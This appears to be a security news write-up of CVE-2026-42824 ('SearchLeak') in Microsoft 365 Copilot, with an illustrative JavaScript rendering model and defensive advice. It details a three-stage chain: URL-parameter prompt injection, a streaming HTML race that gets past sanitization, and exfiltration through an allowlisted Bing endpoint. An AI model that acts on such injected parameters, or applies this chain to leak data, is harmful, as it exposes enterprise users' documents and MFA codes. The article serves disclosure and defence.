CVE-2026-42824 Grants 1-Click Data Theft via M365 Copilot
Varonis researchers disclosed SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot enabling 1-click exfiltration of enterprise data.
On June 15, 2026, Varonis Threat Labs detailed SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot Enterprise Search. Tracked as CVE-2026-42824, the exploit allows attackers to extract sensitive corporate data, including multi-factor authentication codes and internal documents, requiring only a single click on a malicious URL. Microsoft applied a backend mitigation for the flaw in early June, requiring no manual updates from enterprise administrators.
The Three-Stage Attack Architecture
The exploit relies on a novel parameter-to-prompt injection combined with standard web security flaws. The initial vector exploits the q parameter in the Copilot search endpoint. Instead of acting as a standard search query, the system interprets this parameter as a direct instruction, allowing attackers to command the AI to locate specific sensitive assets.
To bypass output sanitization, the attack triggers an HTML rendering race condition. Microsoft wraps Copilot outputs in code blocks to neutralize malicious markup. Because the response streams to the browser, raw HTML renders momentarily before the guardrails finish processing. If the payload includes an image tag, the browser issues the request for the image source immediately.
The final exfiltration step exploits Bing’s “Search by Image” feature. Attackers append the stolen data to an image URL pointing to the Bing domain. Since this domain is allowlisted in the Copilot page’s Content Security Policy, the browser permits the request. Bing’s backend then executes a server-side request forgery, fetching the nonexistent image from the attacker’s server and writing the stolen data into their logs.
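The rendering race in the second stage can be modelled in a few lines. This is an added example, not code from Varonis or Microsoft: a simplified model in which a "frame" is the HTML handed to the browser after each streamed chunk, comparing sanitization applied at the end of the stream with escaping applied per chunk. The function names, the allowlisted.example host and the sample chunks are constructed for illustration.

```javascript
// Simplified model of a streamed-answer renderer (assumption: not Microsoft's code).
// A "frame" is the HTML string the page would hand to the browser after each chunk.
const escapeHtml = (s) =>
  s.replace(/[&<>"']/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));

// Vulnerable pattern: chunks are appended as markup while streaming, and the
// escaping code-block wrapper is applied only once the stream has ended.
function renderSanitizeAtEnd(chunks) {
  const frames = [];
  let raw = "";
  for (const chunk of chunks) {
    raw += chunk;
    frames.push(raw); // live markup is visible to the browser here
  }
  frames.push(`<pre><code>${escapeHtml(raw)}</code></pre>`); // too late
  return frames;
}

// Hardened pattern: every chunk is escaped before it is appended, so no
// intermediate frame contains markup derived from model output. Escaping is
// per character, so a tag split across chunk boundaries is still neutralized.
function renderEscapePerChunk(chunks) {
  const frames = [];
  let safe = "";
  for (const chunk of chunks) {
    safe += escapeHtml(chunk);
    frames.push(`<pre><code>${safe}</code></pre>`);
  }
  return frames;
}

// URLs a browser would request for complete <img> tags seen in any frame.
function imageFetches(frames) {
  const urls = new Set();
  const imgTag = /<img\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  for (const frame of frames) {
    for (const m of frame.matchAll(imgTag)) urls.add(m[1]);
  }
  return [...urls];
}

// Constructed sample stream: an image tag split across chunk boundaries.
const sampleChunks = ["Result: <im", 'g src="https://allowlisted.example/i?d=', 'CONSTRUCTED-VALUE">', " done"];

console.log("sanitize-at-end fetches:", imageFetches(renderSanitizeAtEnd(sampleChunks)));
console.log("escape-per-chunk fetches:", imageFetches(renderEscapePerChunk(sampleChunks)));
```

The final frame of the sanitize-at-end renderer is clean, which is why checking only the finished page misses the request that already left the browser.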
Vulnerability Scope and Scoring
The National Vulnerability Database assigned CVE-2026-42824 a severity score of 7.5, higher than Microsoft’s internal 6.5 rating. The severity stems from the low friction of the attack and the high value of the targeted data.
Attackers leverage legitimate Microsoft domains to host the malicious payloads, effectively bypassing standard URL filtering and anti-phishing layers. Because the exploit triggers without the victim needing to type a prompt or authorize a new application, the success rate is notably higher than that of traditional phishing campaigns. This incident highlights the growing necessity for robust defenses against prompt injection at the parameter level.
If you are securing a Microsoft 365 Copilot deployment, audit your legacy data structures and user access permissions. Copilot indexes and surfaces any file the user has permission to view, so overshared internal documents enlarge the blast radius of 1-click vulnerabilities. Restricting lateral data access limits what AI-driven exploits can extract.